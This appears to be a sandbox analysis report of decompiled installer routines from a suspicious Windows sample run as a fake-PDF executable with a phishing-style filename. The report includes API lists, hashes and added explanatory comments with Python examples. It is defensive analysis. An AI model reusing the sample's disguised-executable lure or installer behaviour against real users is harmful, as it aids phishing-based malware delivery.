                                                                        • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405247(CHAR* _a4, CHAR* _a8) {
                                                                        				struct _PROCESS_INFORMATION _v20;
                                                                        				signed char _t10;
                                                                        				int _t12;
                                                                        
                                                                        				0x7a1588->cb = 0x44;
                                                                        				_t10 = GetFileAttributesA(_a8);
                                                                        				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
                                                                        					_a8 = 0;
                                                                        				}
                                                                        				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
                                                                        				if(_t12 != 0) {
                                                                        					CloseHandle(_v20.hThread);
                                                                        					return _v20.hProcess;
                                                                        				}
                                                                        				return _t12;
                                                                        			}

                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                        • CloseHandle.KERNEL32(?), ref: 00405290
                                                                        Strings
                                                                        • Error launching installer, xrefs: 00405247
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AttributesCloseCreateFileHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 2000254098-66219284
                                                                        • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                        • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
                                                                        • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                        • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004054CC(CHAR* _a4) {
                                                                        				CHAR* _t7;
                                                                        
                                                                        				_t7 = _a4;
                                                                        				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                                        					lstrcatA(_t7, 0x409010);
                                                                        				}
                                                                        				return _t7;
                                                                        			}

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
                                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
                                                                        • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2659869361-3081826266
                                                                        • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                        • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
                                                                        • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                        • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E00402386(void* __eax, void* __eflags) {
                                                                        				void* _t15;
                                                                        				char* _t18;
                                                                        				int _t19;
                                                                        				char _t24;
                                                                        				int _t27;
                                                                        				intOrPtr _t33;
                                                                        				void* _t35;
                                                                        
                                                                        				_t15 = E00402B61(__eax);
                                                                        				_t33 =  *((intOrPtr*)(_t35 - 0x14));
                                                                        				 *(_t35 - 0x30) =  *(_t35 - 0x10);
                                                                        				 *(_t35 - 0x44) = E00402A9A(2);
                                                                        				_t18 = E00402A9A(0x11);
                                                                        				 *(_t35 - 4) = 1;
                                                                        				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
                                                                        				if(_t19 == 0) {
                                                                        					if(_t33 == 1) {
                                                                        						E00402A9A(0x23);
                                                                        						_t19 = lstrlenA(0x40a418) + 1;
                                                                        					}
                                                                        					if(_t33 == 4) {
                                                                        						_t24 = E00402A7D(3);
                                                                        						 *0x40a418 = _t24;
                                                                        						_t19 = _t33;
                                                                        					}
                                                                        					if(_t33 == 3) {
                                                                        						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
                                                                        					}
                                                                        					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
                                                                        						 *(_t35 - 4) = _t27;
                                                                        					}
                                                                        					_push( *(_t35 + 8));
                                                                        					RegCloseKey();
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
                                                                        • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
                                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
                                                                        • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CloseCreateValuelstrlen
                                                                        • String ID:
                                                                        • API String ID: 1356686001-0
                                                                        • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                        • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
                                                                        • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                        • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			// Reads a file's version resource and returns dwFileVersionMS and dwFileVersionLS as two
                                                                        			// decimal strings (E0040591D wraps wsprintfA, per the API list below). ebx evidently holds 0
                                                                        			// throughout: it is the value written to both outputs and to the cleared error flag.
                                                                        			E00401F4B(char __ebx, char* __edi, char* __esi) {
                                                                        				char* _t21;
                                                                        				int _t22;
                                                                        				void* _t33;
                                                                        
                                                                        				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
                                                                        				_t21 = E00402A9A(0xffffffee);                      // file name argument
                                                                        				 *(_t33 - 0x2c) = _t21;
                                                                        				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
                                                                        				 *__esi = __ebx;                                   // both output strings start empty
                                                                        				 *(_t33 - 8) = _t22;
                                                                        				 *__edi = __ebx;
                                                                        				 *((intOrPtr*)(_t33 - 4)) = 1;                     // error flag: cleared only on success
                                                                        				if(_t22 != __ebx) {
                                                                        					__eax = GlobalAlloc(0x40, __eax);              // 0x40 == GPTR (fixed, zero-initialised)
                                                                        					 *(__ebp - 0x34) = __eax;
                                                                        					if(__eax != __ebx) {
                                                                        						// GetFileVersionInfoA (ref 00401F97 in the API list) fills the buffer here; the
                                                                        						// decompiler folded its return value into the following test.
                                                                        						if(__eax != 0) {
                                                                        							__ebp - 0x44 = __ebp + 8;              // decompiler artefact: address-of the two out-params
                                                                        							// 0x409010 is the sub-block name string in .rdata (its text is not shown in this
                                                                        							// excerpt). The fields read at +8 and +0xc below are dwFileVersionMS and
                                                                        							// dwFileVersionLS of VS_FIXEDFILEINFO, consistent with the "\" root sub-block.
                                                                        							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
                                                                        								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));    // dwFileVersionMS -> first output
                                                                        								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));  // dwFileVersionLS -> second output
                                                                        								 *((intOrPtr*)(__ebp - 4)) = __ebx;    // success: clear the error flag
                                                                        							}
                                                                        						}
                                                                        						_push( *(__ebp - 0x34));
                                                                        						GlobalFree();
                                                                        					}
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));   // accumulate the error flag in a global counter
                                                                        				return 0;
                                                                        			}
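What the routine above actually extracts, as an added worked example (not code from the report or from the analysed sample): a Python parser for a raw VS_VERSIONINFO resource that locates the VS_FIXEDFILEINFO value, which is what VerQueryValueA returns for the root sub-block, and reads the same two DWORDs at +8 and +0xc. The structure layout is the documented Win32 one; the resource fed to it is constructed inline, and nothing here depends on the contents of the string at 0x409010, which this excerpt does not show.

```python
"""Added example: locate and decode VS_FIXEDFILEINFO in a raw VS_VERSIONINFO resource.

This is the value VerQueryValueA(buf, "\\", ...) hands back; the two DWORDs at +8 and
+0xC of that structure are the ones the routine above converts to decimal strings.
Layout is the documented Win32 one; the resource below is constructed, not taken from
the analysed sample.
"""
import struct

VS_FFI_SIGNATURE = 0xFEEF04BD
# VS_FIXEDFILEINFO: dwSignature, dwStrucVersion, dwFileVersionMS, dwFileVersionLS,
# dwProductVersionMS, dwProductVersionLS, dwFileFlagsMask, dwFileFlags, dwFileOS,
# dwFileType, dwFileSubtype, dwFileDateMS, dwFileDateLS  (13 DWORDs, 52 bytes)
FIXED_FILE_INFO = struct.Struct("<13I")
# VS_VERSIONINFO header: wLength, wValueLength, wType, then szKey "VS_VERSION_INFO\0" in UTF-16
_HEADER = struct.Struct("<HHH")
_KEY = "VS_VERSION_INFO".encode("utf-16-le") + b"\x00\x00"


def locate_fixed_file_info(blob: bytes) -> int:
    """Return the offset of VS_FIXEDFILEINFO inside a VS_VERSIONINFO block (the root sub-block)."""
    if len(blob) < _HEADER.size + len(_KEY):
        raise ValueError("truncated VS_VERSIONINFO header")
    w_length, w_value_length, _w_type = _HEADER.unpack_from(blob, 0)
    if blob[_HEADER.size:_HEADER.size + len(_KEY)] != _KEY:
        raise ValueError("not a VS_VERSIONINFO block")
    if w_value_length != FIXED_FILE_INFO.size:
        raise ValueError("block carries no VS_FIXEDFILEINFO value")
    off = (_HEADER.size + len(_KEY) + 3) & ~3        # Padding1: the Value is DWORD aligned
    if off + FIXED_FILE_INFO.size > min(w_length, len(blob)):
        raise ValueError("VS_FIXEDFILEINFO runs past the end of the block")
    return off


def file_version(blob: bytes):
    """Return (dwFileVersionMS, dwFileVersionLS, dotted major.minor.build.revision)."""
    fields = FIXED_FILE_INFO.unpack_from(blob, locate_fixed_file_info(blob))
    if fields[0] != VS_FFI_SIGNATURE:
        raise ValueError("bad VS_FIXEDFILEINFO signature")
    ms, ls = fields[2], fields[3]                    # offsets +8 and +0xC, as read by the stub
    return ms, ls, f"{ms >> 16}.{ms & 0xFFFF}.{ls >> 16}.{ls & 0xFFFF}"


def stub_outputs(blob: bytes):
    """The two strings the routine above writes to its outputs: wsprintfA("%u") of each DWORD."""
    ms, ls, _ = file_version(blob)
    return str(ms), str(ls)


def build_version_info(major: int, minor: int, build: int, revision: int) -> bytes:
    """Constructed sample: a minimal VS_VERSIONINFO holding only the fixed block."""
    ms = (major << 16) | minor
    ls = (build << 16) | revision
    fixed = FIXED_FILE_INFO.pack(VS_FFI_SIGNATURE, 0x00010000, ms, ls, ms, ls,
                                 0x3F, 0, 0x00040004, 1, 0, 0, 0)   # VOS_NT_WINDOWS32, VFT_APP
    body = _KEY + b"\x00" * ((-(_HEADER.size + len(_KEY))) % 4)     # pad the Value to 4 bytes
    total = _HEADER.size + len(body) + len(fixed)
    return _HEADER.pack(total, len(fixed), 0) + body + fixed


SAMPLE = build_version_info(6, 1, 7601, 17514)      # constructed input, not from the sample

if __name__ == "__main__":
    print(file_version(SAMPLE), stub_outputs(SAMPLE))
```

The length checks are the part worth copying: the stub trusts the size reported by GetFileVersionInfoSizeA and the pointer returned by VerQueryValueA, which is fine when the OS parses the resource, but a static triage tool reading the resource bytes itself has to bound every read against wLength and the buffer.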


                                                                        APIs
                                                                        • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
                                                                        • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
                                                                        • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
                                                                          • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                        • String ID:
                                                                        • API String ID: 1404258612-0
                                                                        • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                        • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
                                                                        • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                        • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			// Moves/renames a file: builds a SHFILEOPSTRUCTA on the stack at ebp-0x64 and calls
                                                                        			// SHFileOperationA with wFunc == 2 (FO_MOVE). The structure is byte-packed on x86, so the
                                                                        			// stack offsets map as: hwnd -0x64, wFunc -0x60, pFrom -0x5c, pTo -0x58, fFlags -0x54 (WORD),
                                                                        			// lpszProgressTitle -0x4a. _t33 is the caller's ebx, evidently 0 (it is used as a NUL below).
                                                                        			E004021F6() {
                                                                        				void* __ebx;
                                                                        				char _t33;
                                                                        				CHAR* _t35;
                                                                        				CHAR* _t38;
                                                                        				void* _t40;
                                                                        
                                                                        				_t35 = E00402A9A(_t33);                        // source path argument
                                                                        				 *(_t40 + 8) = _t35;
                                                                        				_t38 = E00402A9A(0x11);                        // destination path argument
                                                                        				 *(_t40 - 0x64) =  *(_t40 - 8);                // hwnd
                                                                        				 *((intOrPtr*)(_t40 - 0x60)) = 2;              // wFunc = FO_MOVE
                                                                        				( &(_t35[1]))[lstrlenA(_t35)] = _t33;          // pFrom and pTo must be double-NUL-terminated
                                                                        				( &(_t38[1]))[lstrlenA(_t38)] = _t33;          // lists: write the second terminator
                                                                        				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);   // fill the 0x40a418 buffer with a string (E00401D8E uses the same helper for lfFaceName)
                                                                        				lstrcatA(0x40a418, _t38);                      // append the destination path
                                                                        				 *(_t40 - 0x5c) =  *(_t40 + 8);                // pFrom
                                                                        				 *(_t40 - 0x58) = _t38;                        // pTo
                                                                        				 *(_t40 - 0x4a) = 0x40a418;                    // lpszProgressTitle
                                                                        				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));   // fFlags
                                                                        				E00404D62(_t33, 0x40a418);                     // show the text: SetWindowTextA plus a list-view insert (LVM_INSERTITEMA 0x1007, LVM_ENSUREVISIBLE 0x1013 in the API list)
                                                                        				if(SHFileOperationA(_t40 - 0x64) != 0) {
                                                                        					E00404D62(0xfffffff9, _t33);
                                                                        					 *((intOrPtr*)(_t40 - 4)) = 1;             // failure: set the error flag
                                                                        				}
                                                                        				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));   // accumulate the error flag in a global counter
                                                                        				return 0;
                                                                        			}


                                                                        APIs
                                                                        • lstrlenA.KERNEL32 ref: 00402218
                                                                        • lstrlenA.KERNEL32(00000000), ref: 00402222
                                                                        • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                        • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                                                        • String ID:
                                                                        • API String ID: 3674637002-0
                                                                        • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                        • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
                                                                        • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                        • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			// Returns a pointer past the root of a path ("X:\" or "\\host\share\"), or 0 when the path
                                                                        			// has no recognised root. The 16-bit compares are little-endian reads of two consecutive
                                                                        			// characters: 0x5c3a == ":\" and 0x5c5c == "\\". CharNextA is used instead of pointer
                                                                        			// arithmetic so that DBCS lead bytes are stepped over as one character.
                                                                        			E0040555F(CHAR* _a4) {
                                                                        				CHAR* _t3;
                                                                        				char* _t5;
                                                                        				CHAR* _t7;
                                                                        				CHAR* _t8;
                                                                        				void* _t10;
                                                                        
                                                                        				_t8 = _a4;
                                                                        				_t7 = CharNextA(_t8);                      // second character
                                                                        				_t3 = CharNextA(_t7);                      // third character
                                                                        				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {        // not "X:\...": WORD at offset 1 is not ":\"
                                                                        					if( *_t8 != 0x5c5c) {                  // not "\\..." either: no root
                                                                        						L8:
                                                                        						return 0;
                                                                        					}
                                                                        					_t10 = 2;                              // UNC: skip two backslash-terminated components (host, share)
                                                                        					while(1) {
                                                                        						_t10 = _t10 - 1;
                                                                        						_t5 = E004054F7(_t3, 0x5c);        // evidently a find-char: next '\' (0x5c) or the terminator
                                                                        						if( *_t5 == 0) {
                                                                        							goto L8;                       // string ended before the share name did
                                                                        						}
                                                                        						_t3 = _t5 + 1;
                                                                        						if(_t10 != 0) {
                                                                        							continue;
                                                                        						}
                                                                        						return _t3;
                                                                        					}
                                                                        					goto L8;
                                                                        				} else {
                                                                        					return CharNextA(_t3);                 // "X:\" matched: skip the three root characters
                                                                        				}
                                                                        			}
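The two WORD constants above are little-endian reads of two adjacent characters. The following Python port is an added example, not code from the report, that decodes the constants back to text and reproduces the routine's behaviour on the Temp path the report lists as an xref for this function; the UNC inputs are constructed.

```python
"""Added example: Python port of the root-skipping routine above (not code from the report).

The decompiled WORD compares are little-endian reads of two adjacent characters; decoding
the constants back to text makes the checks readable. CharNextA is DBCS-aware; indexing a
Python str gives the same per-character stepping. UNC sample paths are constructed.
"""

DRIVE_SEP = (0x5C3A).to_bytes(2, "little").decode("ascii")    # ':\'
UNC_PREFIX = (0x5C5C).to_bytes(2, "little").decode("ascii")   # '\\'


def skip_root(path: str):
    """Return the path with its root removed, or None when it has no recognised root.

    "C:\\dir\\f"                  -> "dir\\f"   (drive root: three characters skipped)
    "\\\\host\\share\\dir"        -> "dir"      (UNC root: host and share components skipped)
    "relative\\f", "\\\\host\\share" -> None    (no root, or UNC root not closed by a backslash)
    """
    if path and path[1:3] == DRIVE_SEP:          # *_t8 != 0 && *_t7 == 0x5c3a
        return path[3:]                          # CharNextA(_t3)
    if path[:2] == UNC_PREFIX:                   # *_t8 == 0x5c5c
        rest = path[2:]                          # _t3 = CharNextA(CharNextA(path))
        for _ in range(2):                       # _t10 = 2: host, then share
            idx = rest.find("\\")                # E004054F7(_t3, 0x5c)
            if idx < 0:
                return None                      # hit the terminator: incomplete UNC root
            rest = rest[idx + 1:]                # _t5 + 1
        return rest
    return None


if __name__ == "__main__":
    for p in (r"C:\Users\user\AppData\Local\Temp\\", r"\\server\share\dir\f.exe",
              r"\\server\share", r"relative\path"):
        print(repr(p), "->", repr(skip_root(p)))
```

Note the asymmetry the port preserves: a drive path needs only "X:\" to count as rooted, whereas a UNC path is rejected unless both the host and the share are followed by a backslash, so "\\server\share" with nothing after it is treated as having no root.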


                                                                        APIs
                                                                        • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 0040556D
                                                                        • CharNextA.USER32(00000000), ref: 00405572
                                                                        • CharNextA.USER32(00000000), ref: 00405581
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CharNext
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 3213498283-3081826266
                                                                        • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                        • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
                                                                        • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                        • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 61%
                                                                        			// Fills a LOGFONTA at 0x4093d8 and creates the font. The LOGFONTA field offsets explain the
                                                                        			// globals written: lfWeight +0x10 (0x4093e8), lfItalic +0x14 (0x4093ec), lfUnderline +0x15
                                                                        			// (0x4093ed), lfStrikeOut +0x16 (0x4093ee), lfCharSet +0x17 (0x4093ef), lfFaceName +0x1c (0x4093f4).
                                                                        			E00401D8E() {
                                                                        				void* __esi;
                                                                        				int _t6;
                                                                        				signed char _t11;
                                                                        				struct HFONT__* _t14;
                                                                        				void* _t18;
                                                                        				void* _t24;
                                                                        				void* _t26;
                                                                        				void* _t28;
                                                                        
                                                                        				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);                 // 0x5a == LOGPIXELSY
                                                                        				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));     // point size * dpi / 72 (0x48), negated: a negative lfHeight selects by character height (the decompiler shows the negation as ~)
